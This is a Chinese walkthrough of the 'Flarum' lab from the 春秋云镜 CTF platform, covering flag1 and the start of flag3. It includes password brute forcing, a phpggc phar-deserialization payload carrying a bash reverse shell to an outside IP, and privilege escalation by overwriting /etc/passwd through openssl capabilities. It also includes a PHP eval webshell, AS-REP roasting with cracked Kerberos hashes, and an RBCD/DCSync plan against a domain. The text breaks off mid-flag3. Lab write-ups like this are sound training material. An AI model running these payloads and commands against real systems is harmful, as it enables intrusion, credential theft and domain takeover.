春秋云镜 Flarum

前言

本文所使用的工具可参考以下仓库：

Awesome_Pentest_Tools: 一站式渗透测试与红队工具合集，旨在帮助渗透测试人员打造自己的工具链

靶标介绍：

Flarum是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、kerberos协议以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag，分布于不同的靶机。

flag1

请测试 Flarum 社区后台登录口令的安全性，并获取在该服务器上执行任意命令的能力。

./fscan -h 39.99.157.81                          

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
39.99.157.81:22 open
39.99.157.81:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.157.81       code:200 len:5867   title:霄壤社区
已完成 2/2
[*] 扫描结束,耗时: 38.285652778s

弱口令

进入网页，题目描述说了是弱口令，看到下面邮箱为administrator@xiaorang.lab

可以猜测用户名是administrator，用rockyou.txt可以爆破到密码1chris

administrator:1chris

flarum RCE

搜索flarum 1.6.0相关漏洞

看p牛的当年怎么挖Flarum 0day的文章：从偶遇Flarum开始的RCE之旅

利用flarum自定义css功能，在编译Less的时候使用利用data-uri打phar反序列化实现rce

先下一个phpggc，一种类似于yso但是针对php的反序列化利用工具，这里为了可控文件头，我们使用phpggc来生成tar格式包，里面内容就是反弹shell的命令：

./phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/公网IP/54500 0>&1'"

编译成功后会生成一大堆base64代码，复制过来，在后台修改css那里替换下面代码的xxx

@import (inline) 'data:text/css;base64,xxx';

# 换成这样
@import (inline) 'data:text/css;base64,dGVzdC50eHQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDA2NjQAAAAAAAAAAAAAAAAAAAAAADAwMDAwMDAwMDA0ADAwMDAwMDAwMDAwADAwMDYyMjEgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhcgAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0ZXN0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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nbaAAupPE6t5tNiMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=';

填在这里

如下图

接着访问一下主页39.98.107.139确保css样式已经成功修改；也可以访问一下http://39.98.110.249/assets/forum.css，看看是否写入成功

接下来再次修改自定义CSS，使用phar协议包含我们修改的css文件

.test {
    content: data-uri('phar://./assets/forum.css');
}

因为它要编译一段时候，所以点击保存会卡一会儿，这就证明执行成功了，成功弹shell

连上去后flag在root目录，可以capabilities提权，参考下面的文章

Linux提权之：利用capabilities提权

getcap -r / 2>/dev/null
openssl enc -in "/root/flag/flag01.txt"

(remote) www-data@web01:/var/www/html/public/assets$ getcap -r / 2>/dev/null
/snap/core20/1974/usr/bin/ping cap_net_raw=ep
/snap/core20/1405/usr/bin/ping cap_net_raw=ep
/snap/snapd/25577/usr/lib/snapd/snap-confine cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_setgid,cap_setuid,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin=p
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/openssl =ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep                                                                                                     
(remote) www-data@web01:/var/www/html/public/assets$ openssl enc -in "/root/flag/flag01.txt"
                                 _         _       _   _                 
  ___ ___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  ___ 
 / __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
 \___\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
                 |___/                                                   

flag01: flag{7f1d6cf1-a434-4fad-a6c7-2e91e938b520}

也可以写/etc/passwd然后拿root shell

www-data@web01:/tmp$ touch a.txt
www-data@web01:/tmp$ nano a.txt
www-data@web01:/tmp$ cat a.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
ntp:x:113:118::/nonexistent:/usr/sbin/nologin
_chrony:x:114:124:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
fwupd-refresh:x:115:125:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
mysql:x:116:127:MySQL Server,,,:/nonexistent:/bin/false
test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash
www-data@web01:/tmp$ cat a.txt | openssl enc -out "/etc/passwd"
www-data@web01:/tmp$ su test
Password: 
root@web01:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

flag3

请尝试获取内网中Fileserver主机的权限，并发现黑客留下的域控制器后门。

接下来打内网老流程，fscan扫内网，Stowaway建代理

 ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.60.52  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe0f:f3ad  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:0f:f3:ad  txqueuelen 1000  (Ethernet)
        RX packets 245487  bytes 308296803 (308.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 94548  bytes 25622041 (25.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2248  bytes 243922 (243.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2248  bytes 243922 (243.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
./fscan -h 172.22.60.0/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.60.8     is alive
(icmp) Target 172.22.60.42    is alive
(icmp) Target 172.22.60.15    is alive
(icmp) Target 172.22.60.52    is alive
[*] Icmp alive hosts len is: 4
172.22.60.15:139 open
172.22.60.42:139 open
172.22.60.8:88 open
172.22.60.8:139 open
172.22.60.15:135 open
172.22.60.42:135 open
172.22.60.8:135 open
172.22.60.52:80 open
172.22.60.15:445 open
172.22.60.42:445 open
172.22.60.8:445 open
172.22.60.52:22 open
[*] alive ports len is: 12
start vulscan
[*] NetInfo 
[*]172.22.60.15
   [->]PC1
   [->]172.22.60.15
   [->]169.254.73.188
[*] NetBios 172.22.60.8     [+] DC:XIAORANG\DC             
[*] NetInfo 
[*]172.22.60.8
   [->]DC
   [->]172.22.60.8
   [->]169.254.40.63
[*] NetBios 172.22.60.42    XIAORANG\FILESERVER           
[*] NetBios 172.22.60.15    XIAORANG\PC1                  
[*] NetInfo 
[*]172.22.60.42
   [->]Fileserver
   [->]172.22.60.42
   [->]169.254.149.252
[*] WebTitle http://172.22.60.52       code:200 len:5867   title:霄壤社区
已完成 12/12
[*] 扫描结束,耗时: 17.878194029s

总结一下

(icmp) Target 172.22.60.8     XIAORANG\DC
(icmp) Target 172.22.60.42    XIAORANG\FILESERVER 
(icmp) Target 172.22.60.15    XIAORANG\PC1
(icmp) Target 172.22.60.52    拿下

接下来写个马，上蚁剑，注意要在有权限且能访问的目录，我是在/var/www/html/public/assets$

# echo "<?php @eval(\$_POST[cmd]);?>" > 1.php
echo "<?php @eval(\$_POST[cmd]);?>" > /var/www/html/public/assets/1.php

之前登后台的时候看到有很多xxx@xiaorang.com的email，按照春秋云镜之前题目的风格，估计是要打AS-REP Roasting，先查看一下数据库信息：

/var/www/html/config.php翻到数据库配置

<?php return array (
  'debug' => false,
  'database' => 
  array (
    'driver' => 'mysql',
    'host' => 'localhost',
    'port' => 3306,
    'database' => 'flarum',
    'username' => 'root',
    'password' => 'Mysql@root123',
    'charset' => 'utf8mb4',
    'collation' => 'utf8mb4_unicode_ci',
    'prefix' => 'flarum_',
    'strict' => false,
    'engine' => 'InnoDB',
    'prefix_indexes' => true,
  ),
  'url' => 'http://'.$_SERVER['HTTP_HOST'],
  'paths' => 
  array (
    'api' => 'api',
    'admin' => 'admin',
  ),
  'headers' => 
  array (
    'poweredByHeader' => true,
    'referrerPolicy' => 'same-origin',
  ),
);

直接蚁剑连接数据库，可以先检测一下函数支持

要符合下面格式

1. MYSQL（×）

   指的是 PHP 早期的 mysql 扩展（mysql_* 函数，比如 mysql_connect()）。从 PHP 5.5 开始废弃，PHP 7 被完全移除。只支持基础的 MySQL 操作，不支持预处理语句（prepared statement）等新特性。安全性较低，容易受到 SQL 注入攻击。

2. MYSQLI（√）

   指的是 PHP 的 mysqli 扩展（MySQL Improved Extension）。支持 MySQL 4.1 及更高版本，功能更强大，支持面向对象和过程化两种用法。支持预处理语句，更安全，可以防止 SQL 注入。支持事务、存储过程、多查询等高级特性。性能更好，安全性更高。

找到一个用户名的表，导出（注意尽可能全，不要有limit之类的，会限制条数）

AS-REP Roasting

然后AS-REP Roasting

使用GetNPUsers查找不需要Kerberos预身份验证的用户

proxychains4 impacket-GetNPUsers -dc-ip 172.22.60.8  xiaorang.lab/ -usersfile users.txt

proxychains4 impacket-GetNPUsers -dc-ip 172.22.60.8  xiaorang.lab/ -usersfile users.txt
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.8:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.8:88  ...  OK
$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:bfc828b2acf0303cb70fd10223c1ff97$c10998cf772e4e5170ccefd7ab27f855a9d8e364e0b545c43cbf313ba7135065a69a1ac22cf1c81678da6b3272bad4f21527e56fee20015e336f51fa1f312eeece84cbe43fec077644f50051bf5610952fa2c99842eecd7e733d3ac3734c70a2df40428f9dc791b117e3a2898491ba74666aeeb46f52d1e0e916d94c2db49fc7fb47dc617fd2d85922c461e8b80f7a27c0d3dd2a5bf4ab67d4bf95ccd162aadab601f283763e190550eef6fc9af980891258ef721b10b6011aaf1b621359c0121811b1c8f4807478c24dee95795f119ef3513bf8085b5acfd571743416233f8280d3702ef00b395a5b12ebb9
$krb5asrep$23$wangyun@XIAORANG.LAB:da3faf0f09f579cb2c7b4efc566a224f$179608f7d8266c83249b063b9a39bd45e95aeae9b22a0c42a1b7adec94246b93fc46895ff35e627015d36eaf992670289af4dcbf0a2fbe964f0fa4adf4646c89fe816785cdc107876dbb012b18b8629069754636d98d8eeae95f973fa3585d573c87ba4d837c5656db6bb12fb3dd52bcf3a12a2cebaef1781e1659f8e346c8d4d34f9ecd123ecf0ff75b68156a91ccbe4169218e491671d7999c310c9bdf3243f82a154e485b005e8c646b3a47ebb0f8f40adfd8e48578253d8423c485c080fee787f2eb1b5d0d824c5b879a4a4ec9544e42ae05677e7afb4c506ea1c1bd3cf14df87ff47d3bbabe4f43dab4
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.8:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                                   

得到两个哈希，用hashcat爆破一下

hashcat -a 0 -m 18200 --force 1.txt /usr/share/wordlists/rockyou.txt
hashcat -m 18200 1.txt -a 0 /usr/share/wordlists/rockyou.txt  --force

# 结果如下
$krb5asrep$23$wangyun@XIAORANG.LAB:da3faf0f09f579cb2c7b4efc566a224f$179608f7d8266c83249b063b9a39bd45e95aeae9b22a0c42a1b7adec94246b93fc46895ff35e627015d36eaf992670289af4dcbf0a2fbe964f0fa4adf4646c89fe816785cdc107876dbb012b18b8629069754636d98d8eeae95f973fa3585d573c87ba4d837c5656db6bb12fb3dd52bcf3a12a2cebaef1781e1659f8e346c8d4d34f9ecd123ecf0ff75b68156a91ccbe4169218e491671d7999c310c9bdf3243f82a154e485b005e8c646b3a47ebb0f8f40adfd8e48578253d8423c485c080fee787f2eb1b5d0d824c5b879a4a4ec9544e42ae05677e7afb4c506ea1c1bd3cf14df87ff47d3bbabe4f43dab4:Adm12geC

利用这个账号密码做一下信息收集，跑一下bloodhound

proxychains bloodhound-python -u wangyun -p Adm12geC -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp

发现zhangxin@xiaorang.lab用户属于 Account Operators 组的成员（但是我们现在还登录不了他），因此对域内非域控的所有机器都具有GenericAll权限，而FILESERVER机器有DCSync，这个就是题目描述里说的黑客留下的域控制器后门，所以思路很明显，就是用zhangxin对FILESERVER配置RBCD, 然后DCSync拿下域控。

因此下一步思路肯定就是获取zhangxin这个用户的信息了，DC和FILESERVER肯定是后面打的，突破口在这个PC1

先看看wangyun能登录哪个主机

proxychains -q netexec rdp 172.22.60.52/24 -u wangyun -p Adm12geC
RDP         172.22.60.42    3389   Fileserver       [*] Windows 10 or Windows Server 2016 Build 17763 (name:Fileserver) (domain:xiaorang.lab) (nla:True)
RDP         172.22.60.42    3389   Fileserver       [-] xiaorang.lab\wangyun:Adm12geC 
RDP         172.22.60.8     3389   DC               [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC) (domain:xiaorang.lab) (nla:True)
RDP         172.22.60.15    3389   PC1              [*] Windows 10 or Windows Server 2016 Build 17763 (name:PC1) (domain:xiaorang.lab) (nla:True)
RDP         172.22.60.8     3389   DC               [+] xiaorang.lab\wangyun:Adm12geC 
RDP         172.22.60.15    3389   PC1              [+] xiaorang.lab\wangyun:Adm12geC (Pwn3d!)

Xshell密码读取

使用wangyun@xiaorang.lab\Adm12geC账号rdp上去，发现桌面有一个xshell

proxychains xfreerdp3 /u:wangyun /p:Adm12geC /v:172.22.60.15 /d:xiaorang.lab /clipboard /cert:ignore

玩过取证的应该都接触过破解xshell，这里用最简单的SharpXDecrypt就能抓密码了

